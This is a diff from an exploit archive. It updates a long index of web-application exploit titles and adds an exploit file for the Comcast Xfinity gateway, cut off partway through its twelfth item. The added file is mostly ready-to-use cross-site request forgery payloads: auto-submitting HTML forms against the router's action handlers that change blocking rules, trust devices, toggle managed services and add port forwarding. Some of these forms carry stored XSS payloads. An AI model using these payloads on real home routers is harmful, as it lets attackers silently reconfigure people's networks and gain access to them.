8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion",2009-03-17,Garry,php,webapps,0
8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0
8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0
8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0
8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0
8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0
8243,platforms/php/webapps/8243.txt,"Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0
@ -20711,7 +20714,7 @@ id,file,description,date,author,platform,type,port
8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0
8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0
8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0
8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0
8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0
8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0
8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0
@ -21676,7 +21679,7 @@ id,file,description,date,author,platform,type,port
10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MySQL Scripts - Authentication Bypass",2009-12-01,DUNDEE,php,webapps,0
10261,platforms/linux/webapps/10261.txt,"dotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",linux,webapps,80
10262,platforms/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure",2009-12-01,cr4wl3r,linux,webapps,80
10263,platforms/linux/webapps/10263.txt,"Quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities",2009-12-01,cr4wl3r,linux,webapps,80
10263,platforms/linux/webapps/10263.txt,"Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion",2009-12-01,cr4wl3r,linux,webapps,80
10272,platforms/php/webapps/10272.txt,"Joomla! Component Joaktree 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",php,webapps,0
10273,platforms/php/webapps/10273.txt,"Joomla! Component MojoBlog 0.15 - Multiple Remote File Inclusion",2009-12-01,kaMtiEz,php,webapps,0
10274,platforms/php/webapps/10274.txt,"Simple Machines Forum (SMF) - Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0
@ -23744,7 +23747,7 @@ id,file,description,date,author,platform,type,port
14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) SQL Injection",2010-08-14,LiquidWorm,php,webapps,0
14647,platforms/php/webapps/14647.php,"PHP-Fusion - Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0
14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
14650,platforms/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,php,webapps,0
14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0
14655,platforms/php/webapps/14655.txt,"Joomla! Component 'com_equipment' - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
14656,platforms/php/webapps/14656.txt,"Joomla! Component 'com_jgrid' 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0
@ -25084,7 +25087,7 @@ id,file,description,date,author,platform,type,port
18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0
18348,platforms/php/webapps/18348.txt,"w-CMS 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0
18350,platforms/php/webapps/18350.txt,"WordPress Plugin Age Verification 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0
18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0
18352,platforms/php/webapps/18352.txt,"Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0
18353,platforms/php/webapps/18353.txt,"WordPress Plugin wp-autoyoutube - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0
18355,platforms/php/webapps/18355.txt,"WordPress Plugin Count Per Day - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0
18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0
@ -27178,7 +27181,7 @@ id,file,description,date,author,platform,type,port
25086,platforms/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - Cross-Site Scripting",2013-04-29,DaOne,windows,webapps,0
25087,platforms/php/webapps/25087.txt,"Joomla! 3.0.3 - 'remember.php' PHP Object Injection",2013-04-26,EgiX,php,webapps,0
25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0
25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 - index.php SQL Injection",2005-02-09,Zeelock,php,webapps,0
25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 - 'index.php' SQL Injection",2005-02-09,Zeelock,php,webapps,0
25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps,0
25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0
25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0
@ -28009,7 +28012,7 @@ id,file,description,date,author,platform,type,port
26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0
26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0
26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 - USR Parameter Cross-Site Scripting",2005-08-31,rgod,php,webapps,0
26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 - Lang.php Remote File Inclusion",2005-08-31,groszynskif,php,webapps,0
26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion",2005-08-31,groszynskif,php,webapps,0
26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 - events.php HTML Injection",2005-09-06,conor.e.buckley,php,webapps,0
26224,platforms/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 - Description Field HTML Injection",2005-09-06,retrogod@aliceposta.it,php,webapps,0
26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary File Upload",2005-09-06,rgod,php,webapps,0
@ -28120,7 +28123,7 @@ id,file,description,date,author,platform,type,port
26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - quote.php forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0
26380,platforms/php/webapps/26380.txt,"Chipmunk Forum - recommend.php ID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0
26381,platforms/php/webapps/26381.txt,"Chipmunk Directory - recommend.php entryID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0
26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 - detail.php HTML Injection",2005-10-22,sikikmail,php,webapps,0
26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 - 'detail.php' HTML Injection",2005-10-22,sikikmail,php,webapps,0
26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x - 'index.php' Multiple Remote File Inclusion",2005-10-22,abducter_minds@yahoo.com,php,webapps,0
26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x - 'index.php' Cross-Site Scripting",2005-10-26,alex@aleksanet.com,php,webapps,0
26388,platforms/php/webapps/26388.txt,"Nuked-klaN 1.7 Download Module - 'dl_id' Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0
@ -30280,7 +30283,7 @@ id,file,description,date,author,platform,type,port
29269,platforms/php/webapps/29269.txt,"ProNews 1.5 - lire-avis.php aa Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0
29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c - Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0
29271,platforms/asp/webapps/29271.txt,"AppIntellect SpotLight CRM - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0
29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0
29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0
29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0
29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 - form.php Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0
29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 - form.php Multiple Parameter Cross-Site Scripting",2006-12-14,Mr_KaLiMaN,php,webapps,0
@ -30462,7 +30465,7 @@ id,file,description,date,author,platform,type,port
30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0
30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0
30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0
30028,platforms/php/webapps/30028.txt,"EQDKP 1.3.1 - Show Variable Cross-Site Scripting",2007-05-12,kefka,php,webapps,0
30028,platforms/php/webapps/30028.txt,"EQdkp 1.3.1 - Cross-Site Scripting",2007-05-12,kefka,php,webapps,0
29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - (class.utilitycontroller.php) PHP Object Injection",2013-11-08,EgiX,php,webapps,80
29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80
29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80
@ -30787,7 +30790,7 @@ id,file,description,date,author,platform,type,port
29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal - Down_Indir.asp SQL Injection",2007-04-30,ertuqrul,asp,webapps,0
29935,platforms/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0
29938,platforms/php/webapps/29938.txt,"E-Annu - home.php SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0
29941,platforms/php/webapps/29941.txt,"CMS Made Simple 105 - Stylesheet.php SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0
29941,platforms/php/webapps/29941.txt,"CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0
29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0
29946,platforms/php/webapps/29946.txt,"Multiple WordPress Orange Themes - Cross-Site Request Forgery (Arbitrary File Upload)",2013-12-01,"Jje Incovers",php,webapps,0
30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0
@ -31889,7 +31892,6 @@ id,file,description,date,author,platform,type,port
31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0
31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 - 'index.php' Cross-Site Scripting",2008-05-14,ZoRLu,php,webapps,0
31795,platforms/php/webapps/31795.txt,"Links Pile - 'link.php' SQL Injection",2008-08-14,HaCkeR_EgY,php,webapps,0
31796,platforms/php/webapps/31796.txt,"Internet PhotoShow - 'login_admin' Parameter Unauthorized Access",2008-05-14,t0pP8uZz,php,webapps,0
31797,platforms/asp/webapps/31797.txt,"philboard 0.5 - W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0
31798,platforms/php/webapps/31798.txt,"philboard 0.5 - W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0
31799,platforms/php/webapps/31799.txt,"philboard 0.5 - W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0
@ -32501,7 +32503,7 @@ id,file,description,date,author,platform,type,port
32784,platforms/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'Username' Field HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0
32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0
33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router - Cross-Site Request Forgery (Admin Password)",2014-04-30,"shyamkumar somana",hardware,webapps,80
33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - Cross-Site Request Forgery",2014-04-10,"High-Tech Bridge SA",php,webapps,80
32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80
32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'login.asp' Multiple SQL Injection",2009-02-10,"Francesco Bianchino",asp,webapps,0
@ -32666,7 +32668,7 @@ id,file,description,date,author,platform,type,port
40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80
40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80
40082,platforms/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80
33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - 'category.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0
33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0
33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps,0
@ -32705,10 +32707,10 @@ id,file,description,date,author,platform,type,port
33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds 1.5.9 - SQL Injection",2009-08-25,"Andrew Horton",php,webapps,0
33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 - 'CookieUsername' Cookie Parameter SQL Injection",2009-08-28,Inj3ct0r,php,webapps,0
33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0
33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Parameter Remote File Inclusion",2009-09-09,"Beenu Arora",php,webapps,0
33206,platforms/php/webapps/33206.txt,"MKPortal 1.x - Multiple Modules Cross-Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
33208,platforms/php/webapps/33208.txt,"MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
@ -32805,7 +32807,7 @@ id,file,description,date,author,platform,type,port
33385,platforms/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0
33389,platforms/php/webapps/33389.txt,"eGroupWare 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80
33390,platforms/php/webapps/33390.txt,"WordPress Plugin Yoast Google Analytics 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps,0
33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps,0
33391,platforms/php/webapps/33391.txt,"Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps,0
33392,platforms/php/webapps/33392.txt,"Joomla! Component YOOtheme Warp5 - 'yt_color' Parameter Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0
33393,platforms/php/webapps/33393.txt,"Joomla! Component You!Hostit! 1.0.1 Template - Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0
33394,platforms/php/webapps/33394.txt,"Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting",2009-12-09,Xacker,php,webapps,0
@ -33301,9 +33303,9 @@ id,file,description,date,author,platform,type,port
34294,platforms/php/webapps/34294.txt,"Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0
34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0
34298,platforms/php/webapps/34298.py,"CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0
34298,platforms/php/webapps/34298.py,"CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0
34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 - 'default_cms_lang' Parameter Local File Inclusion",2010-07-11,"John Leitch",php,webapps,0
34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0
34300,platforms/php/webapps/34300.py,"CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0
34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0
34303,platforms/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - File Inclusion",2014-08-09,Vulnerability-Lab,ios,webapps,8000
34305,platforms/ios/webapps/34305.txt,"Easy FTP Pro 4.2 iOS - Command Injection",2014-08-09,Vulnerability-Lab,ios,webapps,8080
@ -33406,7 +33408,7 @@ id,file,description,date,author,platform,type,port
34473,platforms/php/webapps/34473.txt,"Property Watch - email.php videoid Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
34475,platforms/php/webapps/34475.txt,"Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps,0
34477,platforms/php/webapps/34477.txt,"Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0
34481,platforms/php/webapps/34481.txt,"123 Flash Chat - Multiple Security Vulnerabilities",2010-08-16,Lincoln,php,webapps,0
@ -34427,7 +34429,7 @@ id,file,description,date,author,platform,type,port
36109,platforms/php/webapps/36109.txt,"Mambo Component 'com_n-myndir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0
36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0
36113,platforms/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0
36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0
36116,platforms/asp/webapps/36116.txt,"Kisanji - 'gr' Parameter Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0
36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x - Multiple Cross-Site Scripting / SQL Injection",2011-09-06,"Yassin Aboukir",php,webapps,0
@ -36832,3 +36834,7 @@ id,file,description,date,author,platform,type,port
40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0
40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080
40850,platforms/php/webapps/40850.txt,"Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",php,webapps,0
40851,platforms/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0

Can't render this file because it is too large.

348
platforms/hardware/webapps/40853.txt Executable file
View file

@ -0,0 +1,348 @@
EXPLOIT TITLE: CSRF RCE XFINITY WEB GATEWAY
AUTHOR: Pabstersac
DATE: 1ST OF AUGUST 2016
CVE: N/A
CATEGORY: REMOTE
CONTACT: pabstersac@gmail.com
IF ANYONE HAS COMMUNICATION WITH VENDOR PLEASE NOTIFY THEM SINCE THEY HAVE IGNORED ME.
CSRF FOR COMCAST XFINITY WEB GATEWAY. LEADS TO RCE AND ACCESS TO THE NETWORK AND MORE.
VENDOR HAS BEEN NOTIFIED NUMEROUS TIMES BUT NO RESPONSE RECEIVED.
1) ADD BLOCKED SITE
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">
<input type="hidden" name='BlockInfo' value='{"URL": "http://test1.com", "alwaysBlock": "true"}'>
</form>
<script>document.x.submit();</script>
2) ADD BLOCKED KEYWORD
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">
<input type="hidden" name='BlockInfo' value={“Keyword”: "http://test1.com", "alwaysBlock": "true"}'>
</form>
<script>document.x.submit();</script>
3) REMOVE BLOCKED SITE OR KEYWORD
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_remove_blockedSite.php" method="post">
<input type="hidden" name='removeBlockInfo' value='{"InstanceID": "6"}'>
</form>
<script>document.x.submit();</script>
4) TRUST/UNTRUST DEVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_trust_computer.php" method="post">
<input type="hidden" name='TrustFlag' value='{"trustFlag": "true", "HostName": "test", "IPAddress": "10.0.0.82"}'>
</form>
<script>document.x.submit();</script>
5) DISABLE/ENABLE MANAGED SITES
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_enable_manageSite.php" method="post">
<input type="hidden" name='Enable' value='{"Enable": "true"}'>
</form>
<script>document.x.submit();</script>
6) ADD MANAGED SERVICE (COMES WITH BONUS STORED XSS ;)
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='service' value='<img src=x onerror=alert(0)>'>
<input type="hidden" name='protocol' value='UDP'>
<input type="hidden" name='startPort' value='1234'>
<input type="hidden" name='endPort' value='1234'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
7) DELETE MANAGED SERVICE
http://10.0.0.1/actionHandler/ajax_managed_services.php?del=1
8) DISABLE/ENABLE MANAGED SERVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">
<input type="hidden" name='set' value='true'>
<input type="hidden" name='UMSStatus' value='Enabled'>
</form>
<script>document.x.submit();</script>
9) UNBLOCK DEVICE
http://10.0.0.1/actionHandler/ajax_managed_devices.php?del=2
10) ADD BLOCKED DEVICE (COMES WITH BONUS STORED XSS ;)
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<img src=x onerror=alert(0)>'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x2'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
11) ENABLE/DISABLE MANAGED DEVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='set' value='true'>
<input type="hidden" name='UMDStatus' value='Enabled'>
</form>
<script>document.x.submit();</script>
12) ADD PORT FORWARDING SERVICE (COMES WITH BONUS STORED XSS ;)
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
